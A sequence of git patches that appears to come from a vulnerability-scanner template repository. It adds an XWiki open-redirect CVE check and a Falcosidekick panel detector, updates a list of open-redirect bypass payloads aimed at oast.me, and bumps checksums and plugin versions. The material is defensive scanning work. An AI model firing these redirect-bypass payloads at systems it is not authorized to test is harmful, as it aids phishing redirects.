http/misconfiguration/mixed-active-content.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/mixed-active-content.yaml b/http/misconfiguration/mixed-active-content.yaml index 74bcc5d8730..5bdbf3caeec 100644 --- a/http/misconfiguration/mixed-active-content.yaml +++ b/http/misconfiguration/mixed-active-content.yaml @@ -28,7 +28,7 @@ http: part: body negative: true regex: - - "(?mi)" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "", "OpenGraph no video")' + - 'status_code == 200 || status_code == 500' + - 'contains(header, "text/html")' + condition: and From bf11ca445164857043f784888af06b2ba672734a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 13 Jul 2024 20:58:41 +0530 Subject: [PATCH 124/247] Create CVE-2023-29204.yaml --- http/cves/2023/CVE-2023-29204.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-29204.yaml diff --git a/http/cves/2023/CVE-2023-29204.yaml b/http/cves/2023/CVE-2023-29204.yaml new file mode 100644 index 00000000000..42aef997f6e --- /dev/null +++ b/http/cves/2023/CVE-2023-29204.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-29204 + +info: + name: XWiki - Open Redirect + author: ritikchaddha + severity: medium + description: | + XWiki Commons are technical libraries common to several other top level XWiki projects. It is possible to bypass the existing security measures put in place to avoid open redirect by using a redirect such as `//mydomain.com` (i.e. omitting the `http:`). It was also possible to bypass it when using URL such as `http:/mydomain.com`. The problem has been patched on XWiki 13.10.10, 14.4.4 and 14.8RC1. + impact: | + An attacker can redirect users to malicious websites, leading to phishing attacks or malware downloads. + remediation: | + Implement proper input validation and sanitize user-controlled input to prevent open redirect vulnerabilities. + reference: + - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-xwph-x6xj-wggv + - https://jira.xwiki.org/browse/XWIKI-10309 + - https://jira.xwiki.org/browse/XWIKI-19994 + - https://nvd.nist.gov/vuln/detail/CVE-2023-29204 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-29204 + cwe-id: CWE-601 + epss-score: 0.00094 + epss-percentile: 0.39237 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2023,xwiki,redirect + +http: + - method: GET + path: + - "{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//www.oast.me" + - "{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=http:/www.oast.me" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 From 95d81675a330fb4aae0fbed28fe03a2a21ea8fda Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jul 2024 00:22:21 +0000 Subject: [PATCH 125/247] Auto WordPress Plugins Update [Sun Jul 14 00:22:21 UTC 2024] :robot: --- .../wordpress/plugins/stops-core-theme-and-plugin-updates.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt b/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt index 5eeb3f978cd..f12f145375c 100644 --- a/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt +++ b/helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt @@ -1 +1 @@ -9.0.17 \ No newline at end of file +9.0.18 \ No newline at end of file From 61b6c1dc30a0c930e593193f1f1d2b4b2844ff9c Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 14 Jul 2024 09:41:09 +0200 Subject: [PATCH 126/247] Add files via upload --- http/exposed-panels/falcosidekick-panel.yaml | 26 ++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 http/exposed-panels/falcosidekick-panel.yaml diff --git a/http/exposed-panels/falcosidekick-panel.yaml b/http/exposed-panels/falcosidekick-panel.yaml new file mode 100644 index 00000000000..a0115c36a44 --- /dev/null +++ b/http/exposed-panels/falcosidekick-panel.yaml @@ -0,0 +1,26 @@ +id: falcosidekick-panel + +info: + name: Falcosidekick UI Login Panel - Detect + author: righettod + severity: info + description: Falcosidekick UI login panel was detected. + reference: + - https://github.com/falcosecurity/falcosidekick-ui + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"Falcosidekick" + tags: panel,falco,detect,login + +http: + - method: GET + path: + - '{{BaseURL}}/login/' + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "falcosidekick ui", "falcosidekick-ui")' + condition: and \ No newline at end of file From 64cbf97e14ddf184d967abc024fae9dc71b30fe5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 14 Jul 2024 13:36:22 +0530 Subject: [PATCH 127/247] updated domain --- .../redirect/open-redirect.yaml | 4 +- .../generic/open-redirect-generic.yaml | 184 +++++++++--------- 2 files changed, 94 insertions(+), 94 deletions(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 47d693a75aa..50d350f14df 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -16,7 +16,7 @@ http: payloads: redirect: - - "example.com" + - "oast.me" fuzzing: - part: query @@ -174,7 +174,7 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 - type: status status: diff --git a/http/vulnerabilities/generic/open-redirect-generic.yaml b/http/vulnerabilities/generic/open-redirect-generic.yaml index dbb5973f19f..c3d8e7880f9 100644 --- a/http/vulnerabilities/generic/open-redirect-generic.yaml +++ b/http/vulnerabilities/generic/open-redirect-generic.yaml @@ -20,99 +20,99 @@ http: payloads: redirect: - - '%0a/example.com/' - - '%0d/example.com/' - - '%00/example.com/' - - '%09/example.com/' - - '%5C%5Cexample.com/%252e%252e%252f' - - '%5Cexample.com' - - '%5cexample.com/%2f%2e%2e' - - '%5c{{RootURL}}example.com/%2f%2e%2e' - - '../example.com' - - '.example.com' - - '/%5cexample.com' - - '////\;@example.com' - - '////example.com' - - '///example.com' - - '///example.com/%2f%2e%2e' - - '///example.com@//' - - '///{{RootURL}}example.com/%2f%2e%2e' - - '//;@example.com' - - '//\/example.com/' - - '//\@example.com' - - '//\example.com' - - '//\texample.com/' - - '//example.com/%2F..' - - '//example.com//' + - '%0a/oast.me/' + - '%0d/oast.me/' + - '%00/oast.me/' + - '%09/oast.me/' + - '%5C%5Coast.me/%252e%252e%252f' + - '%5Coast.me' + - '%5coast.me/%2f%2e%2e' + - '%5c{{RootURL}}oast.me/%2f%2e%2e' + - '../oast.me' + - '.oast.me' + - '/%5coast.me' + - '////\;@oast.me' + - '////oast.me' + - '///oast.me' + - '///oast.me/%2f%2e%2e' + - '///oast.me@//' + - '///{{RootURL}}oast.me/%2f%2e%2e' + - '//;@oast.me' + - '//\/oast.me/' + - '//\@oast.me' + - '//\oast.me' + - '//\toast.me/' + - '//oast.me/%2F..' + - '//oast.me//' - '//%69%6e%74%65%72%61%63%74%2e%73%68' - - '//example.com@//' - - '//example.com\texample.com/' - - '//https://example.com//' - - '/<>//example.com' - - '/\/\/example.com/' - - '/\/example.com' - - '/\example.com' - - '/example.com' - - '/example.com/%2F..' - - '/example.com/' - - '/example.com/..;/css' - - '/https:example.com' - - '/{{RootURL}}example.com/' - - '/〱example.com' - - '/〵example.com' - - '/ゝexample.com' - - '/ーexample.com' - - '/ーexample.com' - - '<>//example.com' - - '@example.com' - - '@https://example.com' - - '\/\/example.com/' + - '//oast.me@//' + - '//oast.me\toast.me/' + - '//https://oast.me//' + - '/<>//oast.me' + - '/\/\/oast.me/' + - '/\/oast.me' + - '/\oast.me' + - '/oast.me' + - '/oast.me/%2F..' + - '/oast.me/' + - '/oast.me/..;/css' + - '/https:oast.me' + - '/{{RootURL}}oast.me/' + - '/〱oast.me' + - '/〵oast.me' + - '/ゝoast.me' + - '/ーoast.me' + - '/ーoast.me' + - '<>//oast.me' + - '@oast.me' + - '@https://oast.me' + - '\/\/oast.me/' - 'example%E3%80%82com' - - 'example.com' - - 'example.com/' - - 'example.com//' - - 'example.com;@' - - 'https%3a%2f%2fexample.com%2f' - - 'https:%0a%0dexample.com' - - 'https://%0a%0dexample.com' - - 'https://%09/example.com' - - 'https://%2f%2f.example.com/' - - 'https://%3F.example.com/' - - 'https://%5c%5c.example.com/' - - 'https://%5cexample.com@' - - 'https://%23.example.com/' - - 'https://.example.com' - - 'https://////example.com' - - 'https:///example.com' - - 'https:///example.com/%2e%2e' - - 'https:///example.com/%2f%2e%2e' - - 'https:///example.com@example.com/%2e%2e' - - 'https:///example.com@example.com/%2f%2e%2e' - - 'https://:80#@example.com/' - - 'https://:80?@example.com/' - - 'https://:@\@example.com' - - 'https://:@example.com\@example.com' - - 'https://;@example.com' - - 'https://\texample.com/' - - 'https://example.com/example.com' - - 'https://example.com/https://example.com/' - - 'https://www.\.example.com' - - 'https:/\/\example.com' - - 'https:/\example.com' - - 'https:/example.com' - - 'https:example.com' - - '{{RootURL}}example.com' - - '〱example.com' - - '〵example.com' - - 'ゝexample.com' - - 'ーexample.com' - - 'ーexample.com' - - 'redirect/example.com' - - 'cgi-bin/redirect.cgi?example.com' - - 'out?example.com' - - 'login?to=http://example.com' - - '1/_https@example.com' - - 'redirect?targeturl=https://example.com' + - 'oast.me' + - 'oast.me/' + - 'oast.me//' + - 'oast.me;@' + - 'https%3a%2f%2foast.me%2f' + - 'https:%0a%0doast.me' + - 'https://%0a%0doast.me' + - 'https://%09/oast.me' + - 'https://%2f%2f.oast.me/' + - 'https://%3F.oast.me/' + - 'https://%5c%5c.oast.me/' + - 'https://%5coast.me@' + - 'https://%23.oast.me/' + - 'https://.oast.me' + - 'https://////oast.me' + - 'https:///oast.me' + - 'https:///oast.me/%2e%2e' + - 'https:///oast.me/%2f%2e%2e' + - 'https:///oast.me@oast.me/%2e%2e' + - 'https:///oast.me@oast.me/%2f%2e%2e' + - 'https://:80#@oast.me/' + - 'https://:80?@oast.me/' + - 'https://:@\@oast.me' + - 'https://:@oast.me\@oast.me' + - 'https://;@oast.me' + - 'https://\toast.me/' + - 'https://oast.me/oast.me' + - 'https://oast.me/https://oast.me/' + - 'https://www.\.oast.me' + - 'https:/\/\oast.me' + - 'https:/\oast.me' + - 'https:/oast.me' + - 'https:oast.me' + - '{{RootURL}}oast.me' + - '〱oast.me' + - '〵oast.me' + - 'ゝoast.me' + - 'ーoast.me' + - 'ーoast.me' + - 'redirect/oast.me' + - 'cgi-bin/redirect.cgi?oast.me' + - 'out?oast.me' + - 'login?to=http://oast.me' + - '1/_https@oast.me' + - 'redirect?targeturl=https://oast.me' stop-at-first-match: true @@ -121,7 +121,7 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: From 31d5e16128a034293db3ec5cc74bd0a9f5433a4f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 14 Jul 2024 13:41:38 +0530 Subject: [PATCH 128/247] updated payload --- http/vulnerabilities/generic/open-redirect-generic.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/generic/open-redirect-generic.yaml b/http/vulnerabilities/generic/open-redirect-generic.yaml index c3d8e7880f9..025d5a32943 100644 --- a/http/vulnerabilities/generic/open-redirect-generic.yaml +++ b/http/vulnerabilities/generic/open-redirect-generic.yaml @@ -44,7 +44,7 @@ http: - '//\toast.me/' - '//oast.me/%2F..' - '//oast.me//' - - '//%69%6e%74%65%72%61%63%74%2e%73%68' + - '//%6f%61%73%74%2e%6d%65' - '//oast.me@//' - '//oast.me\toast.me/' - '//https://oast.me//' @@ -67,7 +67,7 @@ http: - '@oast.me' - '@https://oast.me' - '\/\/oast.me/' - - 'example%E3%80%82com' + - 'oast%E3%80%82me' - 'oast.me' - 'oast.me/' - 'oast.me//' From b3d81edcc3d24616e338827c92184c5a4aeaaf2d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 14 Jul 2024 08:14:52 +0000 Subject: [PATCH 129/247] Auto Generated New Template Addition List [Sun Jul 14 08:14:52 UTC 2024] :robot: From d380f92f39ca531e7871d5b14b962546a934b2ad Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jul 2024 08:15:11 +0000 Subject: [PATCH 130/247] Auto Generated Templates Checksum [Sun Jul 14 08:15:11 UTC 2024] :robot: --- templates-checksum.txt | 418 ++++++++++++++++++++--------------------- 1 file changed, 209 insertions(+), 209 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9ce0915a4b9..d90b366a0ef 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -240,7 +240,7 @@ dast/vulnerabilities/injection/xinclude-injection.yaml:ebe8c7fa9a358fc76e42e1be9 dast/vulnerabilities/lfi/lfi-keyed.yaml:62584249ea749ce960527d6675421d9d857d1d7c dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:bd17c8e51fd1ba5083eb381c1ca1a3792597ef65 dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:218f24aa37dd58a83d33318e22794a3d30c25c13 -dast/vulnerabilities/redirect/open-redirect.yaml:4fa1fca9a4a36c7fd81faafd3f7bf474b4efa471 +dast/vulnerabilities/redirect/open-redirect.yaml:68ac64ef8cf7ae88c1484f5c178057ebdcd8023b dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74 @@ -813,12 +813,12 @@ helpers/wordpress/plugins/gutenberg.txt:2aec4d7bf0ab32bb446c2b0aed18357efa20cd9f helpers/wordpress/plugins/happy-elementor-addons.txt:d33f1fbbd8e02405d75783dfb145509ee6f51975 helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:42c9dca141f2cd50ab7fcfa673255d29eac1fe9d -helpers/wordpress/plugins/header-footer-elementor.txt:e1e19bc7267dd9c0a93903ac4803a7f52de3d1d6 +helpers/wordpress/plugins/header-footer-elementor.txt:7a2aa38dbae06f99122c345cced2a9e98d1c22bb helpers/wordpress/plugins/header-footer.txt:e533118608a55d6ab1d3699c600fc5c59213df36 helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/host-webfonts-local.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf -helpers/wordpress/plugins/hostinger.txt:2eb538e42b910c397ab801353b059c51f265f092 +helpers/wordpress/plugins/hostinger.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 helpers/wordpress/plugins/image-optimization.txt:a9ec402f06cdb367cb4ecd9d221265dbc42431cf helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 @@ -891,7 +891,7 @@ helpers/wordpress/plugins/smart-slider-3.txt:ddd091c3f02b8a56a7a2d9a4a0f8387a12a helpers/wordpress/plugins/so-widgets-bundle.txt:6d445f8f926ce0b81a2d46eb8ce60af388326266 helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt:a1231facbb4b8314300cb531105cd765f90c95f1 -helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:3e2cb2d1f1740c5f32e24ad2ae43138ffd391c84 +helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:6c75863a2a166bfaf866032133ae1ec337f07572 helpers/wordpress/plugins/sucuri-scanner.txt:381bb12da04a82580bb6d698b8798743668826bd helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172 helpers/wordpress/plugins/table-of-contents-plus.txt:412a33ae14746612317b013dc23213cd79b5f3f3 @@ -917,13 +917,13 @@ helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:5e0ad8390d778d86a4a3 helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d03f659256ae48f1c9a26c5aaec38d4360485288 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 -helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:f3323ea51e133c445b5c74b7fce4def22ad0f7bb +helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:373c54d47cc406011bd3964962f1e869d501afa4 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c helpers/wordpress/plugins/woocommerce-payments.txt:60d712d9a12f5416daabb3565821281c3cba1d4c helpers/wordpress/plugins/woocommerce-paypal-payments.txt:036622d5a32b0e5099f20d8cff7515dc042253aa helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:a16cd18f1019f04b207109b189b504edbde41ab2 helpers/wordpress/plugins/woocommerce-services.txt:09d7c94b6b07df41fc11fe17f108ad704d3a058e -helpers/wordpress/plugins/woocommerce.txt:24449bd7ae23ee836905591888e76ffedd70554d +helpers/wordpress/plugins/woocommerce.txt:4fb032eb953a74896b4877c6950fc07e329c2a70 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 @@ -5019,7 +5019,7 @@ http/exposures/files/desktop-ini-exposure.yaml:e1f2848de5e29a1d1f0069c15a5451d38 http/exposures/files/django-secret-key.yaml:9a9152c6627c7d1bb85923caedf61303f26e78b9 http/exposures/files/docker-cloud.yaml:1cd831e6d009b49e120b14206b7a19b825fd5272 http/exposures/files/domcfg-page.yaml:28b2f74eed60f6bf047db658ffcf8ccbacfb90a4 -http/exposures/files/ds-store-file.yaml:71084670f41119f2b073dd935fc2e2542a7f44d8 +http/exposures/files/ds-store-file.yaml:0695229ae660cfc1cddec38c9dda770066acd705 http/exposures/files/dwsync-exposure.yaml:811dc04f9ef973b6d48e8b007590508b61230b4b http/exposures/files/environment-rb.yaml:cfd936dc5174ec7eee345830477ad8ee013d5eb4 http/exposures/files/exposed-alps-spring.yaml:0bc7763901ec79b827388db7d80f1c2838d73f1e @@ -7279,228 +7279,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:c4b819dbefb5586f0ed05d801a6d07678d1eaade -http/technologies/wordpress/plugins/add-to-any.yaml:855bec1195e90142a245a9c9bbff6748163e57da -http/technologies/wordpress/plugins/admin-menu-editor.yaml:f6a94d48c1c91a3e12d8db1f2485d9d691084574 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:7dc2ad428f0c013f415d8d41fffa98446e33d3b4 -http/technologies/wordpress/plugins/akismet.yaml:8b27c116ecbb88cb4b2fd821a3b6f9577a01b37b +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:80e66b11e2b2ea95532ac83515ac7ebaa70051f9 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:a7c60454687b207601e5e99002394b5d9dce2ffd -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:34ed501d349e0fe4d40406a166838dcccf73c096 -http/technologies/wordpress/plugins/amp.yaml:f1af46d0222b39299446a3aebd256aba42355876 -http/technologies/wordpress/plugins/antispam-bee.yaml:d9490d12fe724a64298b1f2adc317088a8bf7089 -http/technologies/wordpress/plugins/astra-sites.yaml:24e48ac0089060d2ea45b83d0f2821cae19a3830 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:cffd928fa5c413343b8e7852daaad72577a11c24 -http/technologies/wordpress/plugins/backwpup.yaml:4558cea5dd4813a223490d7958d08a9bd2683fea -http/technologies/wordpress/plugins/better-search-replace.yaml:f378dac561798a50b5a22716d128c3a2f6ffdad6 -http/technologies/wordpress/plugins/better-wp-security.yaml:54cc959306441a84ab4abcadfc9311d3918c50e8 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:7364fd6242c1399650e2eb72c9c1ecc20f3c8845 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:7abb54bf678a29740f0d23a2c4f2abdb89cdadd4 -http/technologies/wordpress/plugins/breeze.yaml:531a349fea2ebe8d18be34c15b0b0d13078b5bce -http/technologies/wordpress/plugins/broken-link-checker.yaml:4c417a7b9fe8114978f5096c400f08e84c632564 -http/technologies/wordpress/plugins/chaty.yaml:ad21778cb3f1eba136e9f09d150a4311411cec70 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:af8adec495191056755fefeb4076a9f34af0496c -http/technologies/wordpress/plugins/classic-editor.yaml:e3b20cfbfe6626ce5eb1c532d303f8393b97ec10 -http/technologies/wordpress/plugins/classic-widgets.yaml:08b202f61784098e82a67a1f2ce5e86162f8e50b -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:725b52daa788cd7169d1d86ade814fb2e4247245 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:bd7a7b62ccb9250ab144cc773a3b4ac0bd781d9e -http/technologies/wordpress/plugins/coblocks.yaml:d9cb686f1ffa042d187921ff9e92a80394e7c7fc -http/technologies/wordpress/plugins/code-snippets.yaml:2813a7430713f50396d5bba0e4d90b9b0b3676b5 -http/technologies/wordpress/plugins/coming-soon.yaml:6e641eed9c1fb7ff822bcb2438e91af7419c87dd -http/technologies/wordpress/plugins/complianz-gdpr.yaml:384285495e27f8c12a6f28b870d831072bd90b00 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:8ab9b1379c6c82fc00ff38946296580c2bdfe2c3 -http/technologies/wordpress/plugins/contact-form-7.yaml:9107d645b06cc5f93abd6243ccddfd5f9af73512 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:254ff3254369fc94b6ab3292f98e9a3e2bf85214 -http/technologies/wordpress/plugins/cookie-law-info.yaml:4bc793afdc54e399280dca0348443c55e9733fc6 -http/technologies/wordpress/plugins/cookie-notice.yaml:4e8ead04526101201070f2e0f1b0535ad389fc0d -http/technologies/wordpress/plugins/copy-delete-posts.yaml:7146f13672a7b77c16b11d5849210a992fb794b5 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:554b666e228811e2284ba6146d5bf7b7c27712b9 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:3837e092cb972185682f06b02c21e8afe12a3043 -http/technologies/wordpress/plugins/custom-css-js.yaml:d7e7484b96aaff7afc089b27520415c80145739c -http/technologies/wordpress/plugins/custom-fonts.yaml:0def07275e086f6676752c7cb6db6915dd3639c2 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:2777c4abadd8a6ffb9a105237cd3a4327d3b5d3a -http/technologies/wordpress/plugins/disable-comments.yaml:9289675a2a6a90db3dce3e9365f8ba1ebb59f991 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:e34c67f65c35f5e3090702ba8bd0c495b4fc592e -http/technologies/wordpress/plugins/duplicate-page.yaml:539e8217686ad56b27fa3c826c19565617100c4a -http/technologies/wordpress/plugins/duplicate-post.yaml:a3b7d49fd8eb5ce9ea43e443cf0d46e78e7f0bd6 -http/technologies/wordpress/plugins/duplicator.yaml:c589b42fa9890b6b93565730e00a6957f5b449b2 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:badde61851f4da669ccb14379d13bccdb1161a41 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b 